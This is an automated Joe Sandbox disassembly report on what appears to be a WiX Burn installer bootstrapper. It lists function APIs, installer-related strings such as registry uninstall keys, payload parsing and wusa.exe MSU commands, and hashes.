Part of subcall function 00CC6B0D: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,?,?,?,00000000,?,?,?,00CC6BB9,?), ref: 00CC6B7B

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00CC6BDD
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00CC6BEE

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: AllocateCheckCloseInitializeMembershipToken
String ID:
API String ID: 2114926846-0
Opcode ID: d0e4aeccf2168cf305b1037905cb069151ebe7b4ea2912682e78e33da0825640
Instruction ID: e3afe0ae199cc5d0fc5b9fa50e5ce8d47453a5c6b2e2888a41d048788c9b5ebb
Opcode Fuzzy Hash: d0e4aeccf2168cf305b1037905cb069151ebe7b4ea2912682e78e33da0825640
Instruction Fuzzy Hash: A111B7B590021AEBDB10DFE4CD95FAEBBB8FF08304F50482EE552E6151E7709A44DB91

Function 00CB90B2 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00029070), ref: 00CB90B7

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9aaa5fa17779981e396221286d66a0d26d3b24c360a384d22cf0cc86353a6c08
Instruction ID: a582c1fbb7c0b561354007ed86eb31ae37275c9b51096ba78c71828f747d8740
Opcode Fuzzy Hash: 9aaa5fa17779981e396221286d66a0d26d3b24c360a384d22cf0cc86353a6c08
Instruction Fuzzy Hash: 3890026029154846464067B0BC0EB4929A4EE5D616F454560F142C4065DF684401D511

Function 00C96C87 Relevance: 82.7, APIs: 1, Strings: 46, Instructions: 444registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,00000000,F08B8007,057CF33B,00020006,00000000), ref: 00C971DE

Strings

Publisher, xrefs: 00C96EDE, 00C96EE3
ParentKeyName, xrefs: 00C96F99, 00C96F9E
EstimatedSize, xrefs: 00C97168, 00C9716D, 00C9717C
3.7.3813.0, xrefs: 00C96E3D
EngineVersion, xrefs: 00C96E47, 00C96E4C
BundleProviderKey, xrefs: 00C96E05, 00C96E0A
engine.cpp, xrefs: 00C96E9D
Comments, xrefs: 00C96FBC, 00C96FC1
BundlePatchCode, xrefs: 00C96DA0, 00C96DA8
URLUpdateInfo, xrefs: 00C96F5E, 00C96F63
Failed to update resume mode., xrefs: 00C971B9
%hs, xrefs: 00C96E42
BundleAddonCode, xrefs: 00C96D64, 00C96D6C
Failed to write update registration., xrefs: 00C97132
DisplayIcon, xrefs: 00C96E65, 00C96E6F
BundleDetectCode, xrefs: 00C96D82, 00C96D8A
NoModify, xrefs: 00C97006, 00C9700D
BundleUpgradeCode, xrefs: 00C96D46, 00C96D4E
"%ls" /modify, xrefs: 00C970F8
%s,0, xrefs: 00C96E6A
ParentDisplayName, xrefs: 00C96F7E, 00C96F83
Failed to cache bundle from path: %ls, xrefs: 00C96CDE
DisplayName, xrefs: 00C96E9E, 00C96EA3
Failed to write %ls value., xrefs: 00C9717D
BundleVersion, xrefs: 00C96DDF, 00C96DE4
SystemComponent, xrefs: 00C9704F, 00C97054
HelpLink, xrefs: 00C96EFE, 00C96F03
DisplayVersion, xrefs: 00C96EBE, 00C96EC3
"%ls" %ls, xrefs: 00C970A6
Failed to write software tags., xrefs: 00C970DD
%hu.%hu.%hu.%hu, xrefs: 00C96DDA
Failed to create registration key., xrefs: 00C96D0B
UninstallString, xrefs: 00C970A1, 00C970AB
BundleCachePath, xrefs: 00C96D2B, 00C96D30
NoElevateOnModify, xrefs: 00C9710F
ModifyPath, xrefs: 00C970F3, 00C970FD
Failed to register the bundle dependency key., xrefs: 00C9719F
/modify, xrefs: 00C97091
URLInfoAbout, xrefs: 00C96F3E, 00C96F43
QuietUninstallString, xrefs: 00C9706A, 00C97074
HelpTelephone, xrefs: 00C96F1E, 00C96F23
/uninstall, xrefs: 00C97098, 00C9709D
BundleTag, xrefs: 00C96E25, 00C96E2A
Contact, xrefs: 00C96FDF, 00C96FE4
"%ls" /uninstall /quiet, xrefs: 00C9706F
NoRemove, xrefs: 00C9702F, 00C97034

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Close
String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.7.3813.0$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EngineVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString$engine.cpp
API String ID: 3535843008-522455924
Opcode ID: 33e1d568f535e3addba5e9100bbb3c4828d7d09a54156abe5731a3bac6a81769
Instruction ID: a7c84f34d8660cd4155df36de9ae156e16238679295bde3a35707764cfa45c81
Opcode Fuzzy Hash: 33e1d568f535e3addba5e9100bbb3c4828d7d09a54156abe5731a3bac6a81769
Instruction Fuzzy Hash: 48E1E330704702ABDF216EA5CD89F5F7AE9AF58744F14013CF94AA2262DBB1EE51E710

Function 00CAA474 Relevance: 79.1, APIs: 7, Strings: 38, Instructions: 365COMMON

Download Yara Rule

Strings

error, xrefs: 00CAA751
Failed to get @InstallArguments., xrefs: 00CAA4CB
success, xrefs: 00CAA731
Type, xrefs: 00CAA716
Failed to get @AsyncUninstall., xrefs: 00CAA651
RepairArguments, xrefs: 00CAA4FE
Code, xrefs: 00CAA7B4
Repairable, xrefs: 00CAA520
Failed to parse @Code value: %ls, xrefs: 00CAA8D2
Failed to allocate memory for exit code structs., xrefs: 00CAA6CB
Failed to get @Protocol., xrefs: 00CAA5F9
UninstallArguments, xrefs: 00CAA4DC
Failed to get @UninstallArguments., xrefs: 00CAA4ED
Failed to get exit code node count., xrefs: 00CAA68F
scheduleReboot, xrefs: 00CAA76F
Protocol, xrefs: 00CAA547
AsyncUninstall, xrefs: 00CAA636
ExitCode, xrefs: 00CAA65F
Failed to get @RepairArguments., xrefs: 00CAA50F
forceReboot, xrefs: 00CAA78F
AsyncRepair, xrefs: 00CAA60A
Failed to get @DetectCondition., xrefs: 00CAA4A9
AsyncInstall, xrefs: 00CAA58B
InstallArguments, xrefs: 00CAA4BA
none, xrefs: 00CAA5D0
Invalid exit code type: %ls, xrefs: 00CAA893
Failed to convert @Code value: %ls, xrefs: 00CAA8A2
Failed to get @AsyncRepair., xrefs: 00CAA625
DetectCondition, xrefs: 00CAA498
burn, xrefs: 00CAA566
Failed to get @Code., xrefs: 00CAA8C0
Failed to get @Type., xrefs: 00CAA8B9
Failed to select exit code nodes., xrefs: 00CAA672
netfx4, xrefs: 00CAA5B1
exeengine.cpp, xrefs: 00CAA6C1
Failed to get @AsyncInstall., xrefs: 00CAA5A6
Failed to get @Repairable., xrefs: 00CAA539
Failed to get next node., xrefs: 00CAA8B2

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: AsyncInstall$AsyncRepair$AsyncUninstall$Code$DetectCondition$ExitCode$Failed to allocate memory for exit code structs.$Failed to convert @Code value: %ls$Failed to get @AsyncInstall.$Failed to get @AsyncRepair.$Failed to get @AsyncUninstall.$Failed to get @Code.$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @Type.$Failed to get @UninstallArguments.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$InstallArguments$Invalid exit code type: %ls$Protocol$RepairArguments$Repairable$Type$UninstallArguments$burn$error$exeengine.cpp$forceReboot$netfx4$none$scheduleReboot$success
API String ID: 760788290-4137368201
Opcode ID: ae3aee5a79f10fde2b2bd05d59ae9c7f9ead7791fb1d0c00cc9a03cd72802ba7
Instruction ID: f9666c9d08096ffeb6abda62d7e9c006ea3496b439fb77bbcf6c90a1277d6646
Opcode Fuzzy Hash: ae3aee5a79f10fde2b2bd05d59ae9c7f9ead7791fb1d0c00cc9a03cd72802ba7
Instruction Fuzzy Hash: 77C1D335E80216FFDB109E60CC45FAEBB64EF06718F104126F914AB2D1D778AE41EB92

Function 00C94D79 Relevance: 75.6, APIs: 3, Strings: 40, Instructions: 363COMMON

Download Yara Rule

APIs

Part of subcall function 00CC5A7C: VariantInit.OLEAUT32(?), ref: 00CC5A92
Part of subcall function 00CC5A7C: SysAllocString.OLEAUT32(?), ref: 00CC5AAE
Part of subcall function 00CC5A7C: VariantClear.OLEAUT32(?), ref: 00CC5B35
Part of subcall function 00CC5A7C: SysFreeString.OLEAUT32(00000000), ref: 00CC5B40

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000001,Packaging,00000000,00000001,FilePath,?,00000001,00CCCBE0,?,00000000), ref: 00C94EA5
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,embedded,000000FF), ref: 00C94EC5
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,external,000000FF), ref: 00C94EE3

Strings

Failed to get @DownloadUrl., xrefs: 00C9513D
LayoutOnly, xrefs: 00C94F3D
Failed to hex decode @CertificateRootThumbprint., xrefs: 00C95167
Packaging, xrefs: 00C94E78
Failed to get payload node count., xrefs: 00C94DC0
embedded, xrefs: 00C94EB7
DownloadUrl, xrefs: 00C94F81
Failed to get @FilePath., xrefs: 00C95107
payload.cpp, xrefs: 00C94DEE
download, xrefs: 00C94E97
Failed to get @Container., xrefs: 00C95115
X, xrefs: 00C950CF
Failed to get @Packaging., xrefs: 00C9510E
SourcePath, xrefs: 00C94F5C
Failed to get @SourcePath., xrefs: 00C95136
CertificateRootThumbprint, xrefs: 00C95016
Failed to to find container: %ls, xrefs: 00C9511F
Failed to get @Catalog., xrefs: 00C9517C
FilePath, xrefs: 00C94E5D
Catalog, xrefs: 00C95084
external, xrefs: 00C94ED5
Failed to get @CertificateRootThumbprint., xrefs: 00C95160
Container, xrefs: 00C94EFF
FileSize, xrefs: 00C94FA6
Failed to parse @FileSize., xrefs: 00C9514B
Failed to get @FileSize., xrefs: 00C95144
Failed to find catalog., xrefs: 00C95183
Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 00C95152
Invalid value for @Packaging: %ls, xrefs: 00C950EC
Failed to hex decode the Payload/@Hash., xrefs: 00C95175
Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 00C95159
CertificateRootPublicKeyIdentifier, xrefs: 00C94FDD
Failed to allocate memory for payload structs., xrefs: 00C94DF8
Failed to get @Hash., xrefs: 00C9516E
Failed to get @LayoutOnly., xrefs: 00C9512F
Payload, xrefs: 00C94D87
Failed to select payload nodes., xrefs: 00C94DA6
Failed to get next node., xrefs: 00C950F3
Failed to get @Id., xrefs: 00C950FD
Hash, xrefs: 00C9504F

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: String$Compare$Variant$AllocClearFreeInit
String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$X$download$embedded$external$payload.cpp
API String ID: 937563602-2914604125
Opcode ID: b283a4dd88ab98b915c34697f041d0af220b3aeb9dfdc2d4713c9bef42b1ac2d
Instruction ID: 026aef5b3155e888758a9cff2c4bd207f9a3b0db5f619436970b1bd4997e8ca4
Opcode Fuzzy Hash: b283a4dd88ab98b915c34697f041d0af220b3aeb9dfdc2d4713c9bef42b1ac2d
Instruction Fuzzy Hash: 0DC10472D40A26FFCF229A94CC49FADB774AF14B10F2102B9F911B7190D771AE51AB90

Function 00CAA8D9 Relevance: 67.0, APIs: 11, Strings: 27, Instructions: 461COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CAA92E
_memset.LIBCMT ref: 00CAA967
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,00CB3DF8), ref: 00CAAF5C
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,00CB3DF8), ref: 00CAAF72

Strings

Failed to CreateProcess on path: %ls, xrefs: 00CAADBA
Process returned error: 0x%x, xrefs: 00CAAE66
"%ls", xrefs: 00CAAAED, 00CAAB0D
Failed to get action arguments for executable package., xrefs: 00CAAA08
Failed to get bundle element., xrefs: 00CAAB47
burn.ancestors, xrefs: 00CAABB0, 00CAABE1
Failed to run netfx chainer: %ls, xrefs: 00CAAD1B
2, xrefs: 00CAADF9
Failed to get cached path for package: %ls, xrefs: 00CAA9AD
Failed to format obfuscated argument string., xrefs: 00CAAAB5
Failed to run bundle as embedded from path: %ls, xrefs: 00CAAC86
%ls -%ls=%ls, xrefs: 00CAAB3E, 00CAAB59, 00CAAB91, 00CAABC1, 00CAABEC
Failed to append the list of dependencies to ignore to the command line., xrefs: 00CAAB69
Failed to build executable path., xrefs: 00CAA9E3
D, xrefs: 00CAAD6B
Failed to create obfuscated executable command., xrefs: 00CAAB21
Failed to wait for executable to complete: %ls, xrefs: 00CAAEA9
Failed to append the list of ancestors to the command line., xrefs: 00CAABD1
Failed to create executable command., xrefs: 00CAAA8C
Bootstrapper application aborted during EXE progress., xrefs: 00CAAE94
Failed to append the list of ancestors to the obfuscated command line., xrefs: 00CAABFC
Failed to run bundle asynchronously from path: %ls, xrefs: 00CAACCD
"%ls" %s, xrefs: 00CAAA78, 00CAAAD1
Failed to append the list of dependencies to ignore to the obfuscated command line., xrefs: 00CAABA1
exeengine.cpp, xrefs: 00CAADAA, 00CAAE56, 00CAAE8A
Failed to format argument string., xrefs: 00CAAA5F
burn.ignoredependencies, xrefs: 00CAAB48, 00CAAB86

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseHandle_memset
String ID: "%ls"$"%ls" %s$%ls -%ls=%ls$2$Bootstrapper application aborted during EXE progress.$D$Failed to CreateProcess on path: %ls$Failed to append the list of ancestors to the command line.$Failed to append the list of ancestors to the obfuscated command line.$Failed to append the list of dependencies to ignore to the command line.$Failed to append the list of dependencies to ignore to the obfuscated command line.$Failed to build executable path.$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$Failed to get action arguments for executable package.$Failed to get bundle element.$Failed to get cached path for package: %ls$Failed to run bundle as embedded from path: %ls$Failed to run bundle asynchronously from path: %ls$Failed to run netfx chainer: %ls$Failed to wait for executable to complete: %ls$Process returned error: 0x%x$burn.ancestors$burn.ignoredependencies$exeengine.cpp
API String ID: 900656945-2335447641
Opcode ID: 85f64d339ab1fad88c1ffa3a3b72c7e676c39134d1dc84e57c41ae1d0ca8eec5
Instruction ID: f6850659491be177e03ec1644b89ccb80625021644b7a7ca0649206499e4b45d
Opcode Fuzzy Hash: 85f64d339ab1fad88c1ffa3a3b72c7e676c39134d1dc84e57c41ae1d0ca8eec5
Instruction Fuzzy Hash: 5B02927194021AAFCF21AFA4CD89FEEB7B5EB55304F1404EAF119A2161D7319E80EF12

Function 00CAF03E Relevance: 58.1, APIs: 8, Strings: 25, Instructions: 378processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CAF06E
GetCurrentProcess.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,00CA0E63,00000007,?,?,Function_0000F6EF,?,?), ref: 00CAF097

Part of subcall function 00CC054B: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,00000000,?,?,00C99175,00000000), ref: 00CC055F
Part of subcall function 00CC054B: GetProcAddress.KERNEL32(00000000), ref: 00CC0566
Part of subcall function 00CC054B: GetLastError.KERNEL32(?,?,00C99175,00000000), ref: 00CC057D

CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00CAF2CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,wusa.exe,?,00000025,?,00000000), ref: 00CAF2D4
GetExitCodeProcess.KERNEL32(?,?), ref: 00CAF361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,wusa.exe,?,00000025,?,00000000), ref: 00CAF36B
CloseHandle.KERNEL32(?,?,000001F4,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025,?), ref: 00CAF47D
CloseHandle.KERNEL32(?,?,000001F4,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025,?), ref: 00CAF48A

Strings

Failed to CreateProcess on path: %ls, xrefs: 00CAF306
Failed to ensure WU service was enabled to install MSU package., xrefs: 00CAF293
wusa.exe, xrefs: 00CAF113
Failed to append SysNative directory., xrefs: 00CAF0EA
Failed to get process exit code., xrefs: 00CAF39A
/log:, xrefs: 00CAF200
Bootstrapper application aborted during MSU progress., xrefs: 00CAF3C1
Failed to allocate WUSA.exe path., xrefs: 00CAF126
2, xrefs: 00CAF329
Failed to format MSU uninstall command., xrefs: 00CAF1EC
"%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 00CAF1D8
Failed to get cached path for package: %ls, xrefs: 00CAF16B
"%ls" "%ls" /quiet /norestart, xrefs: 00CAF1AE
Failed to find System32 directory., xrefs: 00CAF105
Failed to find Windows directory., xrefs: 00CAF0C9
D, xrefs: 00CAF2BD
Failed to get action arguments for MSU package., xrefs: 00CAF145
Failed to wait for executable to complete: %ls, xrefs: 00CAF3CE
Failed to determine WOW64 status., xrefs: 00CAF0A9
Failed to append log switch to MSU command-line., xrefs: 00CAF214
Failed to build MSU path., xrefs: 00CAF19B
Failed to append log path to MSU command-line., xrefs: 00CAF22E
SysNative\, xrefs: 00CAF0D7
msuengine.cpp, xrefs: 00CAF2F9, 00CAF390, 00CAF3B7
Failed to format MSU install command., xrefs: 00CAF1C2

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorHandleLastProcess$Close$AddressCodeCreateCurrentExitModuleProc_memset
String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$msuengine.cpp$wusa.exe
API String ID: 3952624013-2978926632
Opcode ID: 5b7cb830d2a98a4ec5d8549cbc2eb5c1858ed5c6d625ae2deffe269ea556580c
Instruction ID: 2950a63e4828dbdd2865a92c9ff17788fb2271df4097d3be1e6b1a82a1cd8487
Opcode Fuzzy Hash: 5b7cb830d2a98a4ec5d8549cbc2eb5c1858ed5c6d625ae2deffe269ea556580c
Instruction Fuzzy Hash: 7FC1B27194021AEBDF119FD4CC81EAEBBB5AF49708F25413EF610A7151D7708E43ABA0

Function 00C9A119 Relevance: 58.1, APIs: 5, Strings: 28, Instructions: 307COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,80070490,?,?,?,?,?,?,?,?,00CB4052,?,?,?), ref: 00C9A148
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00CB4052,?,?,?,?,?,Chain), ref: 00C9A45E

Strings

Failed to get @Value., xrefs: 00C9A412
Attempt to set built-in variable value: %ls, xrefs: 00C9A3EF
Type, xrefs: 00C9A248
Failed to select variable nodes., xrefs: 00C9A165
Failed to set value of variable: %ls, xrefs: 00C9A44D
Initializing version variable '%ls' to value '%ls', xrefs: 00C9A2E8
Failed to get variable node count., xrefs: 00C9A182
numeric, xrefs: 00C9A263
Failed to insert variable '%ls'., xrefs: 00C9A443
Value, xrefs: 00C9A20A
Initializing numeric variable '%ls' to value '%ls', xrefs: 00C9A281
Failed to get @Hidden., xrefs: 00C9A404
Failed to get @Persisted., xrefs: 00C9A40B
Failed to find variable value '%ls'., xrefs: 00C9A439
Failed to change variant type., xrefs: 00C9A427
Persisted, xrefs: 00C9A1EF
Initializing string variable '%ls' to value '%ls', xrefs: 00C9A2B3
Hidden, xrefs: 00C9A1D4
string, xrefs: 00C9A295
Initializing hidden variable '%ls', xrefs: 00C9A305
Variable, xrefs: 00C9A152
Failed to set variant value., xrefs: 00C9A419
Failed to get @Type., xrefs: 00C9A420
version, xrefs: 00C9A2C6
variable.cpp, xrefs: 00C9A3E2
Invalid value for @Type: %ls, xrefs: 00C9A3D0
Failed to get next node., xrefs: 00C9A3F6
Failed to get @Id., xrefs: 00C9A3FD

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
API String ID: 3168844106-1657652604
Opcode ID: dcfe7b6db4cde63f3d10ca17869f41c93814db8162594a04c0210a9c3739ba46
Instruction ID: 7a189571c8743e962455e6cd47adc98ff977626f87607f778592ccbc27415464
Opcode Fuzzy Hash: dcfe7b6db4cde63f3d10ca17869f41c93814db8162594a04c0210a9c3739ba46
Instruction Fuzzy Hash: C5A15E71D40219BBCF10AFE4CC8ADAEBB75EB08300F24457AFA15B7251D2719E51ABD2

Function 00C9A99D Relevance: 54.6, APIs: 12, Strings: 19, Instructions: 398stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,00C98BDF,?,?,?,?,?,?,?,?,00000001), ref: 00C9A9C0
lstrlenW.KERNEL32(?,?,00C98BDF,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00C9A9C9
_wcschr.LIBCMT ref: 00C9A9F0
_wcschr.LIBCMT ref: 00C9AA07
_wcschr.LIBCMT ref: 00C9AB78
LeaveCriticalSection.KERNEL32(?,00000000,00000000,00CCB5F8,00000000,00000000,00000000,00C98BDF,?,00C98BDF,?,00000000,00C98BDF,00000001,?,00C98BDF), ref: 00C9ADD1
#8.MSI(?,?,00C98BDF,?), ref: 00C9AE08

Strings

Failed to reallocate variable array., xrefs: 00C9AD7D
Failed to set record string., xrefs: 00C9ACC7
Failed to format record., xrefs: 00C9AD30
Failed to allocate record., xrefs: 00C9ABE0
Failed to allocate buffer for format string., xrefs: 00C9A9E0
Failed to format placeholder string., xrefs: 00C9ADBA
Failed to append string., xrefs: 00C9AB9C
*****, xrefs: 00C9AB00
Failed to set variable value., xrefs: 00C9ADB3
Failed to set record format string., xrefs: 00C9AC1F
Failed to get variable name., xrefs: 00C9AD61
Failed to determine variable visibility: '%ls'., xrefs: 00C9ADA3
[%d], xrefs: 00C9AB3F
Failed to copy string., xrefs: 00C9AD4C
variable.cpp, xrefs: 00C9ABD6, 00C9AC15, 00C9AC8C, 00C9ACBD, 00C9AD26, 00C9AD73, 00C9AD8F
Failed to append placeholder., xrefs: 00C9ADC1
Failed to get formatted length., xrefs: 00C9AC96
Failed to allocate variable array., xrefs: 00C9AD99
Failed to allocate string., xrefs: 00C9ACED

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
